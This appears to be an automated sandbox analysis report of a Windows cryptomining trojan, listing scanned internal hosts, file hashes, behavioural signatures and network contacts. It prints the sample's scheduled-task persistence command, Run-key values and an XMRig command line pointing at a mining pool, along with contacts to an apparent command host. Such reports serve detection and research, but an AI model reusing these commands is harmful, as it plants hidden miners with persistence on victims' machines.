N/A 10.127.0.246:1433 tcp
N/A 10.127.0.58:21 tcp
N/A 10.127.0.247:1433 tcp
N/A 10.127.0.59:21 tcp
N/A 10.127.0.248:1433 tcp
N/A 10.127.0.60:21 tcp
N/A 10.127.0.249:1433 tcp
N/A 10.127.0.61:21 tcp
N/A 10.127.0.250:1433 tcp
N/A 10.127.0.62:21 tcp
N/A 10.127.0.251:1433 tcp
N/A 10.127.0.63:21 tcp
N/A 10.127.0.252:1433 tcp
N/A 10.127.0.64:21 tcp
N/A 10.127.0.253:1433 tcp
N/A 10.127.0.65:21 tcp
N/A 10.127.0.254:1433 tcp
N/A 10.127.0.66:21 tcp
N/A 10.127.0.67:21 tcp
N/A 10.127.0.68:21 tcp
N/A 10.127.0.69:21 tcp
N/A 10.127.0.70:21 tcp
N/A 10.127.0.71:21 tcp
N/A 10.127.0.72:21 tcp
N/A 10.127.0.73:21 tcp
N/A 10.127.0.74:21 tcp
N/A 10.127.0.75:21 tcp
N/A 10.127.0.76:21 tcp
N/A 10.127.0.77:21 tcp
N/A 10.127.0.78:21 tcp
N/A 10.127.0.79:21 tcp
N/A 10.127.0.80:21 tcp
N/A 10.127.0.81:21 tcp
N/A 10.127.0.82:21 tcp
N/A 10.127.0.83:21 tcp
N/A 10.127.0.84:21 tcp
N/A 10.127.0.85:21 tcp
N/A 10.127.0.86:21 tcp
N/A 10.127.0.87:21 tcp
N/A 10.127.0.88:21 tcp
N/A 10.127.0.89:21 tcp
N/A 10.127.0.90:21 tcp
N/A 10.127.0.91:21 tcp
N/A 10.127.0.92:21 tcp
N/A 10.127.0.93:21 tcp
N/A 10.127.0.94:21 tcp
N/A 10.127.0.95:21 tcp
N/A 10.127.0.96:21 tcp
N/A 10.127.0.97:21 tcp
N/A 10.127.0.98:21 tcp
N/A 10.127.0.99:21 tcp
N/A 10.127.0.100:21 tcp
N/A 10.127.0.101:21 tcp
N/A 10.127.0.102:21 tcp
N/A 10.127.0.103:21 tcp
N/A 10.127.0.104:21 tcp
N/A 10.127.0.105:21 tcp
N/A 10.127.0.106:21 tcp
N/A 10.127.0.107:21 tcp
N/A 10.127.0.108:21 tcp
N/A 10.127.0.109:21 tcp
N/A 10.127.0.110:21 tcp
N/A 10.127.0.111:21 tcp
N/A 10.127.0.112:21 tcp
N/A 10.127.0.113:21 tcp
N/A 10.127.0.114:21 tcp
N/A 10.127.0.115:21 tcp
N/A 10.127.0.116:21 tcp
N/A 10.127.0.117:21 tcp
N/A 10.127.0.118:21 tcp
N/A 10.127.0.119:21 tcp
N/A 10.127.0.120:21 tcp
N/A 10.127.0.121:21 tcp
N/A 10.127.0.122:21 tcp
N/A 10.127.0.123:21 tcp
N/A 10.127.0.124:21 tcp
N/A 10.127.0.125:21 tcp
N/A 10.127.0.126:21 tcp
N/A 10.127.0.127:21 tcp
N/A 10.127.0.128:21 tcp
N/A 10.127.0.129:21 tcp
N/A 10.127.0.130:21 tcp
N/A 10.127.0.131:21 tcp
N/A 10.127.0.132:21 tcp
N/A 10.127.0.133:21 tcp
N/A 10.127.0.134:21 tcp
N/A 10.127.0.135:21 tcp
N/A 10.127.0.136:21 tcp
N/A 10.127.0.137:21 tcp
N/A 10.127.0.138:21 tcp
N/A 10.127.0.139:21 tcp
N/A 10.127.0.140:21 tcp
N/A 10.127.0.141:21 tcp
N/A 10.127.0.142:21 tcp
N/A 10.127.0.143:21 tcp
N/A 10.127.0.144:21 tcp
N/A 10.127.0.145:21 tcp
N/A 10.127.0.146:21 tcp
N/A 10.127.0.147:21 tcp
N/A 10.127.0.148:21 tcp
N/A 10.127.0.149:21 tcp
N/A 10.127.0.150:21 tcp
N/A 10.127.0.151:21 tcp
N/A 10.127.0.152:21 tcp
N/A 10.127.0.153:21 tcp
N/A 10.127.0.154:21 tcp
N/A 10.127.0.155:21 tcp
N/A 10.127.0.156:21 tcp
N/A 10.127.0.157:21 tcp
N/A 10.127.0.158:21 tcp
N/A 10.127.0.159:21 tcp
N/A 10.127.0.160:21 tcp
N/A 10.127.0.161:21 tcp
N/A 10.127.0.162:21 tcp
N/A 10.127.0.163:21 tcp
N/A 10.127.0.164:21 tcp
N/A 10.127.0.165:21 tcp
N/A 10.127.0.166:21 tcp
N/A 10.127.0.167:21 tcp
N/A 10.127.0.168:21 tcp
N/A 10.127.0.169:21 tcp
N/A 10.127.0.170:21 tcp
N/A 10.127.0.171:21 tcp
N/A 10.127.0.172:21 tcp
N/A 10.127.0.173:21 tcp
N/A 10.127.0.174:21 tcp
N/A 10.127.0.175:21 tcp
N/A 10.127.0.176:21 tcp
N/A 10.127.0.177:21 tcp
N/A 10.127.0.178:21 tcp
N/A 10.127.0.179:21 tcp
N/A 10.127.0.180:21 tcp
N/A 10.127.0.181:21 tcp
N/A 10.127.0.182:21 tcp
N/A 10.127.0.184:21 tcp
N/A 10.127.0.183:21 tcp
N/A 10.127.0.185:21 tcp
N/A 10.127.0.186:21 tcp
N/A 10.127.0.187:21 tcp
N/A 10.127.0.188:21 tcp
N/A 10.127.0.190:21 tcp
N/A 10.127.0.189:21 tcp
N/A 10.127.0.191:21 tcp
N/A 10.127.0.192:21 tcp
N/A 10.127.0.193:21 tcp
N/A 10.127.0.0:19490 tcp
N/A 10.127.0.194:21 tcp
N/A 10.127.0.1:19490 tcp
N/A 10.127.0.2:19490 tcp
N/A 10.127.0.195:21 tcp
N/A 10.127.0.3:19490 tcp
N/A 10.127.0.196:21 tcp
N/A 10.127.0.4:19490 tcp
N/A 10.127.0.197:21 tcp
N/A 10.127.0.5:19490 tcp
N/A 10.127.0.198:21 tcp
N/A 10.127.0.6:19490 tcp
N/A 10.127.0.199:21 tcp
N/A 10.127.0.200:21 tcp
N/A 10.127.0.7:19490 tcp
N/A 10.127.0.201:21 tcp
N/A 10.127.0.8:19490 tcp
N/A 10.127.0.202:21 tcp
N/A 10.127.0.9:19490 tcp
N/A 10.127.0.203:21 tcp
N/A 10.127.0.10:19490 tcp
N/A 10.127.0.11:19490 tcp
N/A 10.127.0.204:21 tcp
N/A 10.127.0.205:21 tcp
N/A 10.127.0.12:19490 tcp
N/A 10.127.0.13:19490 tcp
N/A 10.127.0.206:21 tcp
N/A 10.127.0.14:19490 tcp
N/A 10.127.0.207:21 tcp
N/A 10.127.0.208:21 tcp
N/A 10.127.0.15:19490 tcp
N/A 10.127.0.16:19490 tcp
N/A 10.127.0.209:21 tcp
N/A 10.127.0.17:19490 tcp
N/A 10.127.0.18:19490 tcp
N/A 10.127.0.211:21 tcp
N/A 10.127.0.19:19490 tcp
N/A 10.127.0.210:21 tcp
N/A 10.127.0.212:21 tcp
N/A 10.127.0.20:19490 tcp
N/A 10.127.0.21:19490 tcp
N/A 10.127.0.213:21 tcp
N/A 10.127.0.22:19490 tcp
N/A 10.127.0.214:21 tcp
N/A 10.127.0.23:19490 tcp
N/A 10.127.0.215:21 tcp
N/A 10.127.0.216:21 tcp
N/A 10.127.0.24:19490 tcp
N/A 10.127.0.25:19490 tcp
N/A 10.127.0.217:21 tcp
N/A 10.127.0.26:19490 tcp
N/A 10.127.0.218:21 tcp
N/A 10.127.0.219:21 tcp
N/A 10.127.0.27:19490 tcp
N/A 10.127.0.220:21 tcp
N/A 10.127.0.28:19490 tcp
N/A 10.127.0.29:19490 tcp
N/A 10.127.0.221:21 tcp
N/A 10.127.0.222:21 tcp
N/A 10.127.0.30:19490 tcp
N/A 10.127.0.223:21 tcp
N/A 10.127.0.31:19490 tcp
N/A 10.127.0.224:21 tcp
N/A 10.127.0.32:19490 tcp
N/A 10.127.0.225:21 tcp
N/A 10.127.0.33:19490 tcp
N/A 10.127.0.226:21 tcp
N/A 10.127.0.34:19490 tcp
N/A 10.127.0.35:19490 tcp
N/A 10.127.0.227:21 tcp
N/A 10.127.0.228:21 tcp
N/A 10.127.0.36:19490 tcp
N/A 10.127.0.37:19490 tcp
N/A 10.127.0.229:21 tcp
N/A 10.127.0.38:19490 tcp
N/A 10.127.0.230:21 tcp
N/A 10.127.0.39:19490 tcp
N/A 10.127.0.231:21 tcp
N/A 10.127.0.40:19490 tcp
N/A 10.127.0.232:21 tcp
N/A 10.127.0.233:21 tcp
N/A 10.127.0.41:19490 tcp
N/A 10.127.0.42:19490 tcp
N/A 10.127.0.234:21 tcp
N/A 10.127.0.235:21 tcp
N/A 10.127.0.43:19490 tcp
N/A 10.127.0.44:19490 tcp
N/A 10.127.0.236:21 tcp
N/A 10.127.0.45:19490 tcp
N/A 10.127.0.237:21 tcp
N/A 10.127.0.46:19490 tcp
N/A 10.127.0.238:21 tcp
N/A 10.127.0.47:19490 tcp
N/A 10.127.0.239:21 tcp
N/A 10.127.0.48:19490 tcp
N/A 10.127.0.50:19490 tcp
N/A 10.127.0.51:19490 tcp
N/A 10.127.0.52:19490 tcp
N/A 10.127.0.240:21 tcp
N/A 10.127.0.53:19490 tcp
N/A 10.127.0.241:21 tcp
N/A 10.127.0.242:21 tcp
N/A 10.127.0.54:19490 tcp
N/A 10.127.0.243:21 tcp
N/A 10.127.0.55:19490 tcp
N/A 10.127.0.244:21 tcp
N/A 10.127.0.56:19490 tcp
N/A 10.127.0.57:19490 tcp
N/A 10.127.0.245:21 tcp
N/A 10.127.0.58:19490 tcp
N/A 10.127.0.246:21 tcp
N/A 10.127.0.59:19490 tcp
N/A 10.127.0.247:21 tcp
N/A 10.127.0.60:19490 tcp
N/A 10.127.0.248:21 tcp
N/A 10.127.0.249:21 tcp
N/A 10.127.0.61:19490 tcp
N/A 10.127.0.62:19490 tcp
N/A 10.127.0.250:21 tcp
N/A 10.127.0.63:19490 tcp
N/A 10.127.0.251:21 tcp
N/A 10.127.0.252:21 tcp
N/A 10.127.0.64:19490 tcp
N/A 10.127.0.65:19490 tcp
N/A 10.127.0.253:21 tcp
N/A 10.127.0.254:21 tcp
N/A 10.127.0.66:19490 tcp
N/A 10.127.0.67:19490 tcp
N/A 10.127.0.68:19490 tcp
N/A 10.127.0.69:19490 tcp
N/A 10.127.0.70:19490 tcp
N/A 10.127.0.71:19490 tcp
N/A 10.127.0.72:19490 tcp
N/A 10.127.0.73:19490 tcp
N/A 10.127.0.74:19490 tcp
N/A 10.127.0.75:19490 tcp
N/A 10.127.0.76:19490 tcp
N/A 10.127.0.77:19490 tcp
N/A 10.127.0.78:19490 tcp
N/A 10.127.0.79:19490 tcp
N/A 10.127.0.80:19490 tcp
N/A 10.127.0.81:19490 tcp
N/A 10.127.0.82:19490 tcp
N/A 10.127.0.83:19490 tcp
N/A 10.127.0.84:19490 tcp
N/A 10.127.0.85:19490 tcp
N/A 10.127.0.86:19490 tcp
N/A 10.127.0.87:19490 tcp
N/A 10.127.0.88:19490 tcp
N/A 10.127.0.89:19490 tcp
N/A 10.127.0.90:19490 tcp
N/A 10.127.0.91:19490 tcp
N/A 10.127.0.92:19490 tcp
N/A 10.127.0.93:19490 tcp
N/A 10.127.0.94:19490 tcp
N/A 10.127.0.95:19490 tcp
N/A 10.127.0.96:19490 tcp
N/A 10.127.0.97:19490 tcp
N/A 10.127.0.98:19490 tcp
N/A 10.127.0.99:19490 tcp
N/A 10.127.0.100:19490 tcp
N/A 10.127.0.101:19490 tcp
N/A 10.127.0.102:19490 tcp
N/A 10.127.0.103:19490 tcp
N/A 10.127.0.104:19490 tcp
N/A 10.127.0.105:19490 tcp
N/A 10.127.0.106:19490 tcp
N/A 10.127.0.107:19490 tcp
N/A 10.127.0.108:19490 tcp
N/A 10.127.0.109:19490 tcp
N/A 10.127.0.110:19490 tcp
N/A 10.127.0.111:19490 tcp
N/A 10.127.0.112:19490 tcp
N/A 10.127.0.113:19490 tcp
N/A 10.127.0.114:19490 tcp
N/A 10.127.0.115:19490 tcp
N/A 10.127.0.116:19490 tcp
N/A 10.127.0.117:19490 tcp
N/A 10.127.0.118:19490 tcp
N/A 10.127.0.119:19490 tcp
N/A 10.127.0.120:19490 tcp
N/A 10.127.0.121:19490 tcp
N/A 10.127.0.122:19490 tcp
N/A 10.127.0.123:19490 tcp
N/A 10.127.0.124:19490 tcp
N/A 10.127.0.125:19490 tcp
N/A 10.127.0.126:19490 tcp
N/A 10.127.0.127:19490 tcp
N/A 10.127.0.128:19490 tcp
N/A 10.127.0.129:19490 tcp
N/A 10.127.0.130:19490 tcp
N/A 10.127.0.131:19490 tcp
N/A 10.127.0.132:19490 tcp
N/A 10.127.0.133:19490 tcp
N/A 10.127.0.134:19490 tcp
N/A 10.127.0.135:19490 tcp
N/A 10.127.0.136:19490 tcp
N/A 10.127.0.137:19490 tcp
N/A 10.127.0.138:19490 tcp
N/A 10.127.0.139:19490 tcp
N/A 10.127.0.140:19490 tcp
N/A 10.127.0.141:19490 tcp
N/A 10.127.0.142:19490 tcp
N/A 10.127.0.143:19490 tcp
N/A 10.127.0.144:19490 tcp
N/A 10.127.0.145:19490 tcp
N/A 10.127.0.146:19490 tcp
N/A 10.127.0.147:19490 tcp
N/A 10.127.0.148:19490 tcp
N/A 10.127.0.149:19490 tcp
N/A 10.127.0.150:19490 tcp
N/A 10.127.0.151:19490 tcp
N/A 10.127.0.152:19490 tcp
N/A 10.127.0.153:19490 tcp
N/A 10.127.0.154:19490 tcp
N/A 10.127.0.155:19490 tcp
N/A 10.127.0.156:19490 tcp
N/A 10.127.0.157:19490 tcp
N/A 10.127.0.158:19490 tcp
N/A 10.127.0.159:19490 tcp
N/A 10.127.0.160:19490 tcp
N/A 10.127.0.161:19490 tcp
N/A 10.127.0.162:19490 tcp
N/A 10.127.0.163:19490 tcp
N/A 10.127.0.164:19490 tcp
N/A 10.127.0.165:19490 tcp
N/A 10.127.0.166:19490 tcp
N/A 10.127.0.167:19490 tcp
N/A 10.127.0.168:19490 tcp
N/A 10.127.0.169:19490 tcp
N/A 10.127.0.170:19490 tcp
N/A 10.127.0.171:19490 tcp
N/A 10.127.0.172:19490 tcp
N/A 10.127.0.173:19490 tcp
N/A 10.127.0.174:19490 tcp
N/A 10.127.0.175:19490 tcp
N/A 10.127.0.176:19490 tcp
N/A 10.127.0.177:19490 tcp
N/A 10.127.0.178:19490 tcp
N/A 10.127.0.179:19490 tcp
N/A 10.127.0.180:19490 tcp
N/A 10.127.0.181:19490 tcp
N/A 10.127.0.182:19490 tcp
N/A 10.127.0.184:19490 tcp
N/A 10.127.0.183:19490 tcp
N/A 10.127.0.185:19490 tcp
N/A 10.127.0.186:19490 tcp
N/A 10.127.0.187:19490 tcp
N/A 10.127.0.188:19490 tcp
N/A 10.127.0.189:19490 tcp
N/A 10.127.0.190:19490 tcp
N/A 10.127.0.191:19490 tcp
N/A 10.127.0.192:19490 tcp
N/A 10.127.0.193:19490 tcp
N/A 10.127.0.194:19490 tcp
N/A 10.127.0.195:19490 tcp
N/A 10.127.0.196:19490 tcp
N/A 10.127.0.197:19490 tcp
N/A 10.127.0.198:19490 tcp
N/A 10.127.0.199:19490 tcp
N/A 10.127.0.200:19490 tcp
N/A 10.127.0.201:19490 tcp
N/A 10.127.0.202:19490 tcp
N/A 10.127.0.203:19490 tcp
N/A 10.127.0.204:19490 tcp
N/A 10.127.0.205:19490 tcp
N/A 10.127.0.206:19490 tcp
N/A 10.127.0.207:19490 tcp
N/A 10.127.0.208:19490 tcp
N/A 10.127.0.209:19490 tcp
N/A 10.127.0.210:19490 tcp
N/A 10.127.0.211:19490 tcp
N/A 10.127.0.212:19490 tcp
N/A 10.127.0.213:19490 tcp
N/A 10.127.0.214:19490 tcp
N/A 10.127.0.215:19490 tcp
N/A 10.127.0.216:19490 tcp
N/A 10.127.0.217:19490 tcp
N/A 10.127.0.218:19490 tcp
N/A 10.127.0.219:19490 tcp
N/A 10.127.0.220:19490 tcp
N/A 10.127.0.221:19490 tcp
N/A 10.127.0.222:19490 tcp
N/A 10.127.0.223:19490 tcp
N/A 10.127.0.224:19490 tcp
N/A 10.127.0.225:19490 tcp
N/A 10.127.0.226:19490 tcp
N/A 10.127.0.227:19490 tcp
N/A 10.127.0.228:19490 tcp
N/A 10.127.0.229:19490 tcp
N/A 10.127.0.230:19490 tcp
N/A 10.127.0.231:19490 tcp
N/A 10.127.0.232:19490 tcp
N/A 10.127.0.233:19490 tcp
N/A 10.127.0.234:19490 tcp
N/A 10.127.0.235:19490 tcp
N/A 10.127.0.236:19490 tcp
N/A 10.127.0.237:19490 tcp
N/A 10.127.0.238:19490 tcp
N/A 10.127.0.239:19490 tcp
N/A 10.127.0.240:19490 tcp
N/A 10.127.0.241:19490 tcp
N/A 10.127.0.242:19490 tcp
N/A 10.127.0.243:19490 tcp
N/A 10.127.0.244:19490 tcp
N/A 10.127.0.245:19490 tcp
N/A 10.127.0.246:19490 tcp
N/A 10.127.0.247:19490 tcp
N/A 10.127.0.248:19490 tcp
N/A 10.127.0.249:19490 tcp
N/A 10.127.0.250:19490 tcp
N/A 10.127.0.251:19490 tcp
N/A 10.127.0.252:19490 tcp
N/A 10.127.0.253:19490 tcp
N/A 10.127.0.254:19490 tcp
US 8.8.8.8:53 auto.c3pool.org udp
US 8.8.8.8:53 nishabii.xyz udp

Files

\ProgramData\syabcd.exe

MD5 23d84a7ed2e8e76d0a13197b74913654
SHA1 23d04ba674bafbad225243dc81ce7eccd744a35a
SHA256 ac530d542a755ecce6a656ea6309717ec222c34d7e34c61792f3b350a8a29301
SHA512 aa6b0100d477214d550b6498787190fc1a8fafa7c478f9595d45e4e76ece9888b84dcca26696500d5710a9d1acae4810f2606d8962c46d31f2bdfcdd27bd675c

memory/3016-9-0x0000000004390000-0x00000000049D4000-memory.dmp

memory/2976-10-0x000000013FFA0000-0x00000001405E4000-memory.dmp

memory/2976-11-0x00000000001F0000-0x0000000000204000-memory.dmp

\ProgramData\SMB.exe

MD5 7b2f170698522cd844e0423252ad36c1
SHA1 303ac0aaf0e9f48d4943e57d1ee6c757f2dd48c5
SHA256 5214f356f2e8640230e93a95633cd73945c38027b23e76bb5e617c71949f8994
SHA512 7155477e6988a16f6d12a0800ab72b9b9b64b97a509324ac0669cec2a4b82cd81b3481ae2c2d1ce65e73b017cebb56628d949d6195aac8f6ddd9625a80789dfa

memory/2976-135-0x000000013FFA0000-0x00000001405E4000-memory.dmp

C:\ProgramData\X86.dll

MD5 900c175024c7aa58aab0c62897e2471a
SHA1 fc51f654aa35576b5421869ba621effe73bf1c46
SHA256 de23da87e7fbecb2eaccbb85eeff465250dbca7c0aba01a2766761e0538f90b6
SHA512 45ed21b83987a0a5e4320d06cabf8534aa04dfb0a5f7ff1d9df6ae247f7b813a9a5c8d36edb2132e07ef3f5b0eb49ac1757328ca73ae95d894b7eb23abd591e9

C:\ProgramData\X64.dll

MD5 7dbb3316d7e7c4d367b7ff69768b3472
SHA1 b3457b8ad7600743c55fb31113efbc9313a0ce2e
SHA256 20e32f90720b6cf031498411930c65dc63f1a9b5f6b9553f2582d6f599a7ad48
SHA512 c5a69eaf986f2f41cb3f629f6f1f3334aed3c68ce4cfa49e4732baf4682118520a81dc75f9d02160a7987b6d1abf84c2acb5e06c609b8f283c0f872af66bcd72

C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe

MD5 2cf24966a6aad7b6ecffe04a20eaf3dd
SHA1 e50a4184953faeec7e40bb33f52c08d7f22a2519
SHA256 01c9940b468ce2a58f2bc52f5c8b7d0310451c994d798879ff653d92fbaf8719
SHA512 5e4eda6d61438e46c5e93b994dcda0cddcb24a0f19529605715f74c91a9ad0cf30fd592aba8111d2aaae8c340f6b2860564f6b35e871df3f362afb48aea094f1

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 14:38

Reported

2024-06-14 14:40

Platform

win10v2004-20240611-en

Max time kernel

150s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

UPX packed file

upx

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2cf24966a6aad7b6ecffe04a20eaf3dd.exe" C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2cf24966a6aad7b6ecffe04a20eaf3dd.exe" C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1624 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3960 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1368 wrote to memory of 1480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1624 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1968 wrote to memory of 4916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1624 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 1624 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\SMB.exe
PID 1624 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3064 wrote to memory of 2064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1624 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 1624 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 2852 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1624 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 1624 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3192 wrote to memory of 1272 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1624 wrote to memory of 5736 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 5776 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 5736 wrote to memory of 5836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1624 wrote to memory of 5916 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 1624 wrote to memory of 6028 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 6068 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe

"C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe /F

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ipconfig /flushdns

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /flushdns

C:\ProgramData\SMB.exe

C:\ProgramData\SMB.exe

C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe

C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 31.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 nishabii.xyz udp
CN 218.244.58.70:9011 nishabii.xyz tcp
US 8.8.8.8:53 auto.c3pool.org udp
DE 88.198.117.174:19999 auto.c3pool.org tcp
US 8.8.8.8:53 88.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 174.117.198.88.in-addr.arpa udp
US 8.8.8.8:53 auto.c3pool.org udp
DE 88.198.117.174:19999 auto.c3pool.org tcp
N/A 10.127.0.10:1433 tcp
N/A 10.127.0.203:135 tcp
N/A 10.127.0.11:1433 tcp
N/A 10.127.0.204:135 tcp
N/A 10.127.0.13:1433 tcp
N/A 10.127.0.12:1433 tcp
N/A 10.127.0.206:135 tcp
N/A 10.127.0.205:135 tcp
N/A 10.127.0.15:1433 tcp
N/A 10.127.0.14:1433 tcp
N/A 10.127.0.207:135 tcp
N/A 10.127.0.16:1433 tcp
N/A 10.127.0.208:135 tcp
N/A 10.127.0.209:135 tcp
N/A 10.127.0.18:1433 tcp
N/A 10.127.0.17:1433 tcp
N/A 10.127.0.210:135 tcp
